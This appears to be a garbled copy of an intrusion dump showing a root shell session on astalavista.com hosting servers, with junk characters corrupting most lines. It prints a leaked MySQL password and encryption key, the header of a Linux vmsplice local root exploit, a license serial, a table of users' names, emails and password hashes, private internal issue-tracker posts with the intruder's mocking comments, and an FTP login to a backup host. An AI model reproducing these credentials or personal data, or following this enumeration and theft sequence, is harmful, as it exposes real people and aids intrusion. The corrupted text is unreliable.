) o* t T& C; {9 O$conxUser = ‘hostinguser’; // MySQL user
! A: s& d6 v! B8 o/ s8 o$conxPassword = ‘cXvB3981′; // MySQL password. i0 j2 A* U1 i4 i
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish9 i: |" Y' b* ]
?>
( T$ [( b W' \1 c! n
- G8 R* Y" v: W9 d9 i# Jsh-3.2# cd ..9 W- i1 p d0 v) \1 |
sh-3.2# cd com6 {3 r7 t7 r k$ D0 b* _
sh-3.2# ls -la" o/ q* A9 o+ ?! h7 X
total 141208
! ?$ ]0 J$ z% Ldrwx–x–x 10 com com 4096 Apr 28 12:40 .
2 @" p. A& o4 w4 `$ idrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..6 a; P* W. o! N G( S _
drwx—— 2 com com 4096 Jun 4 04:04 backups
d" F# Y v$ y ]& r) R8 o- Y/ w-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql- V" g* B* s2 P3 M# o
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system; L) ]- d, I/ \/ L K
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history8 b; x/ g" c, m% {" c- ~ e
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout* `0 N$ \) f; T
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile7 F8 Z5 L5 S; b2 h9 C9 U N' X3 V
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
- |# ^" \9 h5 m( l8 a/ a( m) @- Vdrwx–x–x 3 com com 4096 Jan 29 2008 domains
. H6 P; o4 R/ f9 {3 H# Y-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
/ C1 r* d* l2 \4 k- Q3 Ddrwxrwx— 3 com mail 4096 Jan 6 19:24 imap
. [- G( e! R, _: [: L' s-rw——- 1 com com 69 Nov 18 2008 .lesshst v2 i+ i3 h4 g1 C( e
drwx—— 2 com com 4096 Sep 24 2007 mail+ v, h: U% f. j5 \" Y" n
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history) n0 H$ k* G- {( B6 p6 Z
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp3 L$ N( X. ^( r5 a& J5 o+ U
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
6 ^) M" @1 q7 r( f1 ?-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
" Q9 l0 o7 e0 D% w. odrwx—— 2 com com 4096 Aug 26 2008 .ssh
9 `: T2 o1 h, Y-rwx—— 1 com com 8515 Feb 10 2008 t6 d4 X9 S4 ^3 d" g2 l
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
( g% L, {( {, C5 [! c0 J: n% |drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp3 _& J; z& j, h) }
-rw-rw-r– 1 com com 617 May 20 2008 .toprc/ k8 {- o. l9 g, H
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql) U# w$ q4 e' y# p3 h+ N1 J
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo' w# D% ^* P. N
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
' O6 C) q' Y+ z4 b; v
, u# P1 v* I l3 psh-3.2# head t.c. B. s, ]4 |. ~" {. q
/*1 s$ B: n% k# z% y c5 z: \
* jessica_biel_naked_in_my_bed.c2 r- r) a# {, B! M Z0 A/ \+ T6 Q
*9 ^% z" ?3 g: ?- h* ^# E
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura./ V2 @* X; j, Y. T7 A) |
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.7 f: X: F0 P% P- v
* Stejnak je to stare jak cyp a aj jakesyk rozbite.+ |' U. R$ {: I2 ?1 {, k
** A% X2 }) A0 v) ]' ~( L% O( D
* Linux vmsplice Local Root Exploit
4 F/ S. j4 K o, V! q: q* By qaaz/ c8 v+ n, ]& E( K# u! _
*
" F1 v- z, y+ Y2 W$ T
& [# I7 H/ f( @5 C: p csh-3.2# cd /+ d+ f& B7 H+ z& P S4 a
sh-3.2# ls -la
" S0 i$ w: T8 e$ g$ x6 h5 wtotal 360# y1 X* I. U D" Y5 r; A4 T
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. w. E- D. U8 o* ~& o
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..2 M! T* s% K# x, d
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
6 F1 u4 K, i Y8 V$ F Q E-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
2 d8 J" }" J* T8 f, E; Z2 h# M-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db! ^6 w. P+ q$ G
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck# Z; m/ ~& h5 C! R; ^
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel3 A$ K3 x. T* Y3 g( n c! V
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup) Y) h) M6 e" _2 ^. S
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin" B9 l7 G/ O0 h, S$ M
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
! _& N+ r J, X, g( ^drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev8 U5 R; s+ s$ T% v& a, _) o& g7 J
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
3 x: B2 U- T+ o. xdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
, w) \7 c# e/ K* I-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
# D) t% L6 M# P: e. sdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib6 ]6 r3 x1 w: s p! y+ u9 E! h
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64: l( A0 k/ L4 @0 h' K
drwx—— 2 root root 16384 Sep 11 2007 lost+found `7 j/ u3 [. i: O( o& B: z, w; o ~
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
. r6 g* u3 t5 p, O) Qdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc a$ }% b4 z$ ]9 k- n! K4 ]
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt Z6 m. A0 x* e
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
; W9 n- p- F7 pdrwxr-xr-x 2 root root 0 Jun 3 02:43 net$ |! y) g4 u7 G Z1 k
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt( X" K2 e9 p! \' A5 G, d: X) [: y' J
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc- `& U4 i* Y$ _
drwxr-x— 15 root root 4096 Jun 4 08:40 root6 ? p0 i! g! d+ c' l& r/ o$ X
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
3 @7 A O9 B% g8 u( U1 }! Xdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux) \6 V, B6 N! Y- ]3 \
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv4 q8 J5 Z) L5 q/ Q4 w# Z9 R
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
9 c& Z# R5 l6 Q1 G, U1 Y5 r# Qdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
D. U0 _+ [0 rdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr1 b. F) ?8 L: H7 u" T
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
9 Q' R6 y. I+ m- g& p8 a w, b0 N2 D
# c5 n! H6 t& J, j' \6 vsh-3.2# cd opt
2 b- u1 ?. ]" J q1 u6 Osh-3.2# ls -la
: R! g8 Q% ?5 A" D# t0 x9 ~# gtotal 20
# c0 j( s) _' s7 ~1 @drwxr-xr-x 3 root root 4096 Mar 11 17:56 .* v- k# `* r2 a8 H3 a3 ~+ @
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. C9 B, L, h9 Y' W# ^( _, j4 i, v
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws8 a: J+ P2 U L9 F6 m% b& Y4 j
, P; h4 l' @# W& p( \. I
sh-3.2# cd lsws/
2 Q S0 y6 ^9 L4 i; ish-3.2# ls -la
: g6 V8 H# y% ?6 \/ \total 108- n1 A4 q) r5 @0 r) m4 e
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
# U- n. Z2 C# J3 u5 Fdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..: t2 X; T f4 f' R( o3 C
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
1 M5 }- f m6 B: |drwxr-xr-x 13 root root 4096 May 29 15:10 admin4 K1 C: N& }/ ~# P/ u
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
3 W' q/ v2 U& ?6 Rdrwxr-xr-x 2 root root 4096 May 29 15:10 bin" c/ k- {: }, b9 u$ e/ m
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
2 S! h& p; S% [& Sdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT; L. q) K1 j6 \/ ]9 p! C
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
6 r6 y3 O+ ]: ^# Tdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin; \% B8 @) X) z2 g5 s! z
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib( h3 [$ M. R8 `# k( B% D6 ^/ v
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE" g2 k% u. h0 \2 W4 ^" G5 L
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
& Z3 y8 K B$ ]0 ]; h-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
! p$ p! d) I+ B3 C6 L+ Q5 `-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
# y' ]* D. |1 |, a# j# {drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
$ C5 G1 J) R/ ]% n, v0 Cdrwxr-xr-x 2 root root 4096 Mar 20 2008 php
% O- K# L- e: u, Udrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild* [( C! c: B% n ~4 }
drwxr-xr-x 3 root root 4096 Mar 20 2008 share; M$ z) M: t3 C# G# F" M' O
-rw-r–r– 1 root root 6 May 29 15:10 VERSION; I4 n E* S/ X; E* R) P' M, E+ W
" G+ ~& Z% x6 K5 Qsh-3.2# cd conf* p2 ~) [- r j* z. |
sh-3.2# ls -la
4 ~2 a, Q; |( J1 z7 L6 f. u+ h1 \total 48. t7 u! X% [. N5 {, p" ^) `- \0 u
drwx—— 4 apache apache 4096 Jun 3 02:43 .% Y. ^# e) l9 b4 |) m0 M
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..$ U/ { Y5 [& g5 K0 F
drwx—— 2 apache apache 4096 Mar 20 2008 cert$ A7 s2 G% |" y% f- ~; ~" S
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
8 _6 N2 @4 ~5 [8 U5 R& W3 F-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
. l, s8 q7 ? ~9 K1 r0 ]-rw-r–r– 1 root apache 0 Jun 3 14:11 .last. Q) b/ L( N7 s( O! B
-rw——- 1 apache apache 256 May 29 15:10 license.key" Q1 \$ d1 U$ }7 Z" `
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old; P- H$ g( i p
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties( P/ o$ V* v, ?" Q, D. k
-rw——- 1 apache apache 20 May 29 15:10 serial.no
/ b1 n# k9 ]5 q4 zdrwx—— 2 apache apache 4096 Mar 20 2008 templates
4 ]8 l. q/ I: T8 T3 A* I6 Q2 F+ E; {
sh-3.2# cat serial.no( R0 P/ o' G: g5 G4 H4 {# }# ^$ `
IbDl-oVsO-CKqL-wVRa! P: u6 W: L! r
/ K9 X6 n5 u. a' f8 M5 Xsh-3.2# mysql
( X0 V7 {3 A: _: r5 M6 NWelcome to the MySQL monitor. Commands end with ; or \g.5 g6 ?6 ^, z8 S: Q5 F5 U
Your MySQL connection id is 286844. _& s; T0 g3 n7 m: M4 L
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
+ u% Q$ M: Y \$ b- e C
/ _: v; S* s: ~3 w3 E0 M2 zType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer." V/ e- X8 _7 p9 Q0 @
1 w6 K# j0 L' r p2 Zmysql> show databases;
: U! T+ z( z" S5 g( l N0 p; q. N! d+———————–+4 K, H+ T1 s/ t* l# L2 c1 ~3 E3 L a
| Database |
- i: @# i* D1 o( \6 H+———————–+0 j6 D, u0 H0 R0 G2 h
| information_schema |
. n! _5 N: g& X" R| astanet_ads |8 R T, R6 H$ U u+ w, j
| astanet_mailing_lists |: G+ @+ m1 W) m1 Y; C
| astanet_mediawiki |. M1 ?" ?6 i" o3 l @6 _
| astanet_membersystem |
- s( u: a' y& @- j| com_contrexx |3 w' M8 K' S3 w1 B: r d
| com_contrexx2 |
9 j m4 R6 c2 E* l| com_contrexx2_live |
9 d" i, Y; Y" L l0 e. ^6 y| da_roundcube |
* @ s) u. e& t, ^: t: H7 Z| dolphin |( [! H; j: q, W1 E
| ideapool |7 |0 O! U( C3 g
| mysql |
& q6 n/ n) i8 s& {& ]) u: b* p5 |6 H| test |
* c; u. m7 V6 o: c| yourmaster |" Z; L1 ^- b5 P* k" d8 I
+———————–+
# E3 a: }5 L& ~: _' W14 rows in set (0.00 sec)
3 F# t& y6 K* K8 r) I' ^
3 M3 `. m- h; Q5 V/ P( f) K* X Smysql> use ideapool
0 G) q3 c$ F! h2 T( ?% B* a- |Database changed
; M) u: o1 P) n8 L% K) r& O: Hmysql> show tables;
: |. @3 g+ K; {2 b; F9 q+———————————–+
9 Z7 k" Z" c7 t$ u/ P% R4 x6 {| Tables_in_ideapool |; t6 o/ q+ W0 F
+———————————–+2 R; \" w, r8 i! Z8 \
| eventum_columns_to_display |1 n' w1 r9 ?$ S) m1 w2 Q# \
| eventum_custom_field |4 W) R$ J3 e* D' V, I
| eventum_custom_field_option |7 c7 l) o( e. N# r8 N
| eventum_custom_filter |
7 U* w4 \ P8 s1 t$ ?2 W6 }| eventum_customer_account_manager |
8 m% b- P( C7 I g# T& W- j| eventum_customer_note |
- `# |% Y+ ]* b1 |. o7 c, E| eventum_email_account |) Q0 S5 l$ N. M$ I, W1 i
| eventum_email_draft |* V- m% r( [8 `. G
| eventum_email_draft_recipient |* }/ w- g3 J; e) W: l3 K
| eventum_email_response |
% D7 c, Z$ R& A/ c/ E& G| eventum_faq |0 `5 w* U' W0 B2 q$ l* Y& j9 ~
| eventum_faq_support_level |
- W2 S, [* M( r| eventum_group |* m; F2 y+ H8 s
| eventum_history_type |/ o6 Y7 R/ X: p$ r
| eventum_irc_notice |- W- u' e, p0 \$ O; \
| eventum_issue |
$ v, S" B0 Y, B& q| eventum_issue_association |- ]1 [$ Y# \7 f+ ]- h
| eventum_issue_attachment |: d- x+ u. K) Q9 j
| eventum_issue_attachment_file |
5 Y; J; H5 O) g; X9 F6 ^| eventum_issue_checkin |$ m# L1 {5 K- z
| eventum_issue_custom_field |" t* i5 V* @* R( H) n& m
| eventum_issue_history |- R3 T H" z0 S
| eventum_issue_quarantine | V/ e, U2 c) F9 e- ~- i0 s
| eventum_issue_requirement |
+ n: q0 E1 B8 v| eventum_issue_user |
9 R2 S1 X: u U# d| eventum_issue_user_replier |$ k' w; f* c; g& \ t: N% H
| eventum_link_filter |
: h7 _+ T R: u1 t| eventum_mail_queue |1 p; ^' k# N- L6 m# u
| eventum_mail_queue_log |
. _& w- I/ K8 }0 Y; @| eventum_news |
& v& ? c6 X; S) v t! k8 {| eventum_note |6 V) H) m$ z, ]; k# p
| eventum_phone_support |* K/ f( e/ N. Y; y8 v/ w9 ?
| eventum_project |
# v, v& d$ z9 _: G8 k8 Y| eventum_project_category |
4 M/ }( g! L9 V. _3 V% {7 w& H9 A| eventum_project_custom_field |9 a7 P" u7 ^7 c0 P& ^1 N
| eventum_project_email_response |
/ i) ?+ F$ k/ J0 H& f7 T| eventum_project_field_display |2 ?7 I$ ?( x' A7 N
| eventum_project_group |4 J+ `" h' [( A& |2 S5 z
| eventum_project_link_filter |7 K' d# x- o5 J0 c( ]
| eventum_project_news |
- o/ P3 A3 o8 h| eventum_project_phone_category |
8 s+ D$ A1 S8 u; q J( r/ b) R| eventum_project_priority |3 D, v, F$ e I5 l2 y
| eventum_project_release |
x3 J8 C) P4 w: |/ l| eventum_project_round_robin |
$ x% H' o5 ~& U" Q+ w9 y! x* k| eventum_project_status |
' O' J5 s2 d5 e5 X| eventum_project_status_date |
7 s- b" v; T* j% ?| eventum_project_user |. `7 J1 \% {( B9 e9 z0 H6 v6 `- m
| eventum_reminder_action |! _6 H+ Z6 y- \0 ^7 h& ~. M. Q
| eventum_reminder_action_list |- K) [. v* o' L' y
| eventum_reminder_action_type |) z. ~) V" b- J) y- `, w
| eventum_reminder_field |% G7 X2 }! i2 `- ?6 \! R" s0 J
| eventum_reminder_history |& `1 |2 Y' T v! m* s+ r! \6 H
| eventum_reminder_level |
7 U- ~% _) `! z$ a7 x6 A6 T) ~% l# V| eventum_reminder_level_condition |
1 }5 J b7 T8 A, E) A8 C! Z$ \| eventum_reminder_operator |
9 d) Q1 l/ [$ S* v+ e# s| eventum_reminder_priority |
# `2 X8 \8 T, {' p5 W| eventum_reminder_requirement |* @) F3 O) L- w6 r$ y
| eventum_reminder_triggered_action |
8 t, \& L: F' L/ s| eventum_resolution |
8 m+ e5 H5 F8 n2 ?% P- [( w| eventum_round_robin_user |
: H5 Y/ ~; j3 m; {8 s N& [8 Q| eventum_search_profile |: z4 @8 Y8 o" {4 R
| eventum_status | v9 y! E4 f: z! H, ^0 W
| eventum_subscription |) I/ {; F9 ^2 Y
| eventum_subscription_type |
# x8 A% C( }" n3 A7 j4 p| eventum_support_email |
# ^* r7 z7 x( I. a" W! V4 }( K| eventum_support_email_body |) j% \& l' ]# o9 H' ^/ Z2 O
| eventum_time_tracking |6 q7 M2 Z' D+ ^7 e+ l* q/ B, [
| eventum_time_tracking_category |
' _" D& x# Z. y| eventum_user |
3 I- {3 s8 J+ I- h# a* R8 D+———————————–+
2 G5 e* E" W, |& w. [& p69 rows in set (0.00 sec) U6 U$ I e$ g( Z& j5 g% K
+ b$ @+ P6 R" f' {: A, gmysql> describe eventum_user;% D1 z* d$ @5 G9 |0 S5 }* X
+————————-+——————+——+—–+———————+—————-+
4 u7 ] I( P3 \5 _# ^| Field | Type | Null | Key | Default | Extra |
0 i0 m/ k4 b2 a8 H+————————-+——————+——+—–+———————+—————-+
% s' u* U* \8 p) n: b8 T| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
+ x3 y/ A) T' s" ]* @| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |6 z. x, D: |2 d9 ]
| usr_customer_id | int(11) unsigned | YES | | NULL | |. u0 K% _0 D- Q2 I/ f5 V
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
" z! P' E' B% N0 O9 _$ t& F' ]3 L| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
! c1 {6 q7 h- O# x| usr_status | varchar(8) | NO | | active | |6 p0 v$ Z# @4 @3 E* U' a3 w, Z
| usr_password | varchar(32) | NO | | | |( W0 b- O5 H4 `2 b
| usr_full_name | varchar(255) | NO | | | |9 C" c" E0 L- L
| usr_email | varchar(255) | NO | UNI | | |
2 L4 w: H9 d2 k; i( `3 @| usr_preferences | longtext | YES | | NULL | |
6 `% I/ H' z- G3 i9 N| usr_sms_email | varchar(255) | YES | | NULL | |
/ m! M* X& A5 H, C| usr_clocked_in | tinyint(1) | YES | | 0 | |( r& ]6 ]3 Q% ?% U0 W w1 H; h
| usr_lang | varchar(5) | YES | | NULL | |' b' U N3 ~, R6 a! B! O0 d
+————————-+——————+——+—–+———————+—————-+
$ [4 Q+ I/ R: I) y; Q13 rows in set (0.00 sec). v) u m/ n: s
5 }6 \5 V' V" zmysql> select usr_full_name,usr_email,usr_password from eventum_user;
3 J$ P: m7 K* Y7 m, c+———————-+——————————-+———————————-+3 _' i Y5 L2 B9 Q
| usr_full_name | usr_email | usr_password |
0 }7 X7 S9 H6 ^( f' F+———————-+——————————-+———————————-+4 p6 F; N+ W4 @2 q+ V+ W+ b
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |* H0 Y+ T* {( F% P {9 i
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |. X" I6 _7 N" O
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
6 v1 H$ j2 N9 n% f| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
" ?& e4 N0 Y" P; y3 i| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
. v# H0 I$ J3 s L2 f0 Q3 x$ ?| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |, q: C3 S( Q; r, ?
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |# v' y) a* Z9 }+ M' H
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |. [4 U6 j) f6 N4 R
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
5 {) N7 P- B4 {( y! [% ]3 o| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |% c" _! W8 k8 T
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
' P& Y$ f& u6 K* @* x7 @% f| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |+ @7 Y# J8 j/ E) b( b) v
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |) x& Y' P$ n0 @9 J6 n4 g4 S) }
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |: B' Q# @1 @+ D6 W& M7 C! F7 c
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
, ?7 H0 T4 M. ~" M) Q w( P/ q+———————-+——————————-+———————————-+
% i) v) i; ^( e3 a15 rows in set (0.00 sec)
2 o8 R ?7 p! B' l& O* O3 k. ?
* N% [* |6 l; P$ I$ E' xmysql> select iss_description from eventum_issue where iss_id = 43;
" W7 B. ?* K1 P; p4 m1 h. [/ S+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+8 ?0 k U! X0 B- P+ ^5 B0 I
| iss_description
7 f H( z* ]# D|/ Q& B( j9 m$ \* k, ?) f# {
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
- [% Q" `- D, O( C- [| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be/ q7 y- V$ k+ R8 M7 Z: Q
connected for 90 mins… 120mins… so what i propose is something like:
6 l/ p! B8 p7 c7 I6 m+ ]9 ] s' }链接标记[url]http://www.surfthechannel.com/[/url]
" N4 ]! d1 \4 u# K& J, _since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
b6 c f* m. v6 r5 ^1 [ k" ~0 Mlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t! x* W1 K; u* X) {) l$ r8 E8 l4 [+ W, ]
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
: r7 }4 u; @ B$ ~) Uif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
9 O9 h; U* @1 l/ p q$ Z8 v; s' D) s
We could also put advertisement during play on the flash video player itself… extra $$…
; r) Q+ E9 u( F5 S
4 a0 ]7 j/ Z {By sykadul |( j5 b, m6 Y7 U5 T* M
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
3 J4 H! c% f* c1 o1 row in set (0.00 sec)1 X+ f" o+ `6 Z- d+ j- c; r' i
% z- O0 i4 h: f+ l// Money and extra $$ is all they care about. remember that.
- w) L( m: c8 Y. m; v5 Y
$ s8 o3 s; j& ^4 {; B+ }' a# M0 tmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;1 l% F5 S& i/ j0 b3 W3 J
+————————+——————————————————————————————————————————————————————————————————————————————-+- Z0 b; o8 W1 r9 ?3 z* l+ f' o
| iss_summary | iss_description
8 ?( x) ^% p+ {|+ D1 O4 u1 A6 l: F
+————————+——————————————————————————————————————————————————————————————————————————————-+
+ b, H6 I* B) r6 `: p% k) i/ J- O| Forum for REAL EXPERTS | Hello,
* ]! ]6 n9 `0 z$ K
5 _/ a! D H# g8 D% IIshtus and I,: e5 N; z! z& y& z9 `7 K" _2 X n
. H$ X, a4 ]3 [. BCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
$ `2 X1 H6 U$ H) uONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
$ P' v7 }% ` w2 ?4 x: G( p
- V' [1 B* ^0 A! [/ X2 KOne example a friend of mine from coresecurity.com!7 k( I: B) r" V, u+ B5 V1 J7 Q
4 X; z f) z8 y; h* [2 d1 I& Z3 Y
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..7 Z: L( W- ?& P" J: e g. ]6 d
& F) x) ^* K$ }8 |6 a; i
|* v2 X3 v9 N) u# F7 Q P6 T
+————————+——————————————————————————————————————————————————————————————————————————————+
( u5 b/ E7 W3 P8 [% L/ Q1 row in set (0.00 sec)
, y* f- A) _- H" s9 ?+ }( \) d6 u0 s9 x6 a X3 |* b3 O
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
2 s5 @# h: C3 s$ _5 y* C# I, i% |3 b) g+ M4 ?" Z2 I" e! P
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;6 c( w2 y+ ?: n
+——————+———————————————————————————————+
e3 j; I8 J, R+ W2 r# ~| iss_summary | iss_description |9 _+ J$ h; h; D6 X. r
+——————+———————————————————————————————+! H1 l# \0 X* W7 n
| Website guidance | Virtual Girl which guides you trought the website.$ H/ M7 Q8 ~: M
: J$ L" H- |8 r6 o1 w6 xWe need a girl with who you can ( talk )!!!
" l* X, j3 P3 U$ [* LAlso for the News!% q, {$ L0 }' o- X" A; Y1 ~
So my suggestion is a girl who read you the news loud if you like!( _# k. Y% e8 h1 `3 {7 s
you can choose between read yourselfe or she read it for you or both!
! [+ i2 `: D5 |- M) d0 [5 N l
) s1 B$ G( a: R# XGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!* Q( `* K J/ g9 J: h; s6 @
- R% t/ u9 _& r; C+ W
Have a look on the example girls!!" t. ]" S2 j {( g/ `/ g" S
" r( W; \6 ^ G3 S
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]$ G3 L7 j! X+ ~
+ F/ {) [/ S4 M; Z# f* }9 q
or that; _9 s4 f$ b# {3 {: O$ C
* t$ ^7 p' g- y& L( i: Y
链接标记[url]http://www.yellostrom.de/[/url]% ^$ L3 C' Z. g& g4 c) D: O
! {; G# z0 R7 \/ P/ ~
|
9 M- e! k7 h9 n W+——————+———————————————————————————————+. S1 G9 [, } Z: d: {. Q
1 row in set (0.00 sec)
4 @' a. o- ?3 P+ {+ b/ o' y, I# Z: k# |. i7 ^
// ha ha.
0 x! ?9 h I7 q: C/ u1 Q' U% m: e5 L7 x4 \, i8 |
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
+ P- T4 \% `, S3 V' `+————————–+———————————————————————————————————–+
8 `" ?" }* E( o g7 J$ I| iss_summary | iss_description |% n8 ?8 M& j8 [5 ^# ^4 L
+————————–+———————————————————————————————————–+- a# P8 D. p: [/ P8 A& Z
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |. ^8 h7 R6 D* \6 q; v3 V6 x4 d! }3 x
+————————–+———————————————————————————————————–+5 M" C2 K$ Q: i& U
1 row in set (0.00 sec)1 B4 d5 \- \9 p/ N+ }9 q
8 q$ }4 p- I& \! F
// LOL.
: q) Z+ V6 P8 N
. t) O- }4 _( h3 f4 M, omysql> exit/ U: t( L* Z" `/ p
Bye3 _2 b8 p. _6 G1 b1 C5 ^
( k E7 [1 P7 V' ]8 x& k0 `: n$ V4 l
sh-3.2# ftp 212.254.194.1633 G+ o0 F5 p; A: c' N
Connected to 212.254.194.163.
' S4 G0 D9 P. _, f2 M7 _220 BackupCOM_VW FTP server ready.! F& v* s% O/ G( @: E7 @
504 AUTH: security mechanism ‘GSSAPI’ not supported.
! ?; K( r @0 T2 k504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
3 X# M# D, L6 G8 }6 SKERBEROS_V4 rejected as an authentication type
3 x: G. I9 y" g9 GName (212.254.194.163:root): astalavista.com
9 ?+ J. K+ Q( \1 A7 f8 q331 Password required for astalavista.com.; a7 |2 S, g5 h. E: C# O( U/ Q" }
Password:. m9 B4 P( U2 K
230 User astalavista.com logged in.2 C+ K- D8 G0 O1 [% J Q4 y
Remote system type is UNIX.
* s* B; w4 y7 L9 R/ s2 L+ BUsing binary mode to transfer files.
. i' |; h( {+ [6 H8 ]ftp> ls -la F9 q2 W4 i8 J: s/ B. f( z
227 Entering Passive Mode (212,254,194,163,2,188)
2 o+ ^$ j. V8 ~) b3 Z7 c" N150 Opening BINARY mode data connection for ‘file list’.
